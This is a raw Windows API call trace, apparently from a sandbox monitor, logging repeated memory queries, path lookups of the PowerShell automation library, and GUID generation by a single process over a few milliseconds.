	[0143.930] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.931] VirtualQuery (in: lpAddress=0x1cbbd0, lpBuffer=0x1cca90, dwLength=0x30 | out: lpBuffer=0x1cca90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.932] VirtualQuery (in: lpAddress=0x1cbbd0, lpBuffer=0x1cca90, dwLength=0x30 | out: lpBuffer=0x1cca90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.933] VirtualQuery (in: lpAddress=0x1cbbd0, lpBuffer=0x1cca90, dwLength=0x30 | out: lpBuffer=0x1cca90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.934] VirtualQuery (in: lpAddress=0x1cbbd0, lpBuffer=0x1cca90, dwLength=0x30 | out: lpBuffer=0x1cca90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.934] VirtualQuery (in: lpAddress=0x1cb2c0, lpBuffer=0x1cc180, dwLength=0x30 | out: lpBuffer=0x1cc180*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.934] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.935] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.935] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.935] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.936] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.936] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.936] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.936] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.936] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.936] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.937] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.937] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.937] VirtualQuery (in: lpAddress=0x1cb700, lpBuffer=0x1cc5c0, dwLength=0x30 | out: lpBuffer=0x1cc5c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.937] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.938] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.938] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.938] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.939] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc51c7b6, Data2=0xd494, Data3=0x4ac2, Data4=([0]=0x9b, [1]=0xd3, [2]=0x7f, [3]=0x62, [4]=0xd8, [5]=0xfa, [6]=0xf1, [7]=0xbc))) returned 0x0
	[0143.940] VirtualQuery (in: lpAddress=0x1cb2c0, lpBuffer=0x1cc180, dwLength=0x30 | out: lpBuffer=0x1cc180*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.941] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.941] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.942] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xcd408627, Data2=0xea19, Data3=0x4166, Data4=([0]=0xbc, [1]=0x23, [2]=0xfb, [3]=0x73, [4]=0x8f, [5]=0x5b, [6]=0x67, [7]=0xb3))) returned 0x0
	[0143.942] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc0fe4da3, Data2=0xb205, Data3=0x4d69, Data4=([0]=0x95, [1]=0xa8, [2]=0xc4, [3]=0x4b, [4]=0x19, [5]=0x24, [6]=0xfb, [7]=0xdf))) returned 0x0
	[0143.943] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x4205bf29, Data2=0xc7ac, Data3=0x44cb, Data4=([0]=0x8a, [1]=0x53, [2]=0xd3, [3]=0x4a, [4]=0x1a, [5]=0xd1, [6]=0x9c, [7]=0x21))) returned 0x0
	[0143.943] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x8dd9fdad, Data2=0x9189, Data3=0x4881, Data4=([0]=0xac, [1]=0x52, [2]=0x51, [3]=0xd0, [4]=0xff, [5]=0x86, [6]=0xeb, [7]=0xb8))) returned 0x0
	[0143.944] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x9c31d86, Data2=0x8f3d, Data3=0x4f4d, Data4=([0]=0xb9, [1]=0xfb, [2]=0x3f, [3]=0x39, [4]=0xae, [5]=0x6a, [6]=0x93, [7]=0x73))) returned 0x0
	[0143.944] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xaa60d35e, Data2=0xbc65, Data3=0x40ee, Data4=([0]=0xb2, [1]=0x6e, [2]=0x4, [3]=0xeb, [4]=0xfd, [5]=0xc0, [6]=0x23, [7]=0xe2))) returned 0x0
	[0143.944] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xf7265a27, Data2=0xf0f1, Data3=0x4602, Data4=([0]=0xb8, [1]=0x36, [2]=0x44, [3]=0xe9, [4]=0x96, [5]=0x7, [6]=0xe5, [7]=0xb7))) returned 0x0
	[0143.945] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x4f5bb2dc, Data2=0xde8c, Data3=0x4532, Data4=([0]=0xbe, [1]=0xc5, [2]=0x54, [3]=0xfd, [4]=0x3d, [5]=0x31, [6]=0xba, [7]=0x27))) returned 0x0
	[0143.945] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.945] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.946] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.946] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.946] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.946] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.947] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.947] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.947] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.948] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.948] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.948] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.948] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.949] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.949] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.950] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.950] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.950] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.950] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.951] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.951] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xe095dafa, Data2=0xa509, Data3=0x47e4, Data4=([0]=0x8c, [1]=0x5b, [2]=0xe0, [3]=0x4d, [4]=0x9f, [5]=0xf5, [6]=0x40, [7]=0xe3))) returned 0x0
	[0143.951] VirtualQuery (in: lpAddress=0x1cba40, lpBuffer=0x1cc900, dwLength=0x30 | out: lpBuffer=0x1cc900*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.951] VirtualQuery (in: lpAddress=0x1cba40, lpBuffer=0x1cc900, dwLength=0x30 | out: lpBuffer=0x1cc900*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.952] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.952] VirtualQuery (in: lpAddress=0x1cba40, lpBuffer=0x1cc900, dwLength=0x30 | out: lpBuffer=0x1cc900*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.952] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.953] VirtualQuery (in: lpAddress=0x1cba40, lpBuffer=0x1cc900, dwLength=0x30 | out: lpBuffer=0x1cc900*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.953] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.953] VirtualQuery (in: lpAddress=0x1cba40, lpBuffer=0x1cc900, dwLength=0x30 | out: lpBuffer=0x1cc900*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.953] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.954] VirtualQuery (in: lpAddress=0x1cba40, lpBuffer=0x1cc900, dwLength=0x30 | out: lpBuffer=0x1cc900*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.954] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.954] VirtualQuery (in: lpAddress=0x1cba40, lpBuffer=0x1cc900, dwLength=0x30 | out: lpBuffer=0x1cc900*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.955] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.955] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.955] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.956] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.956] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
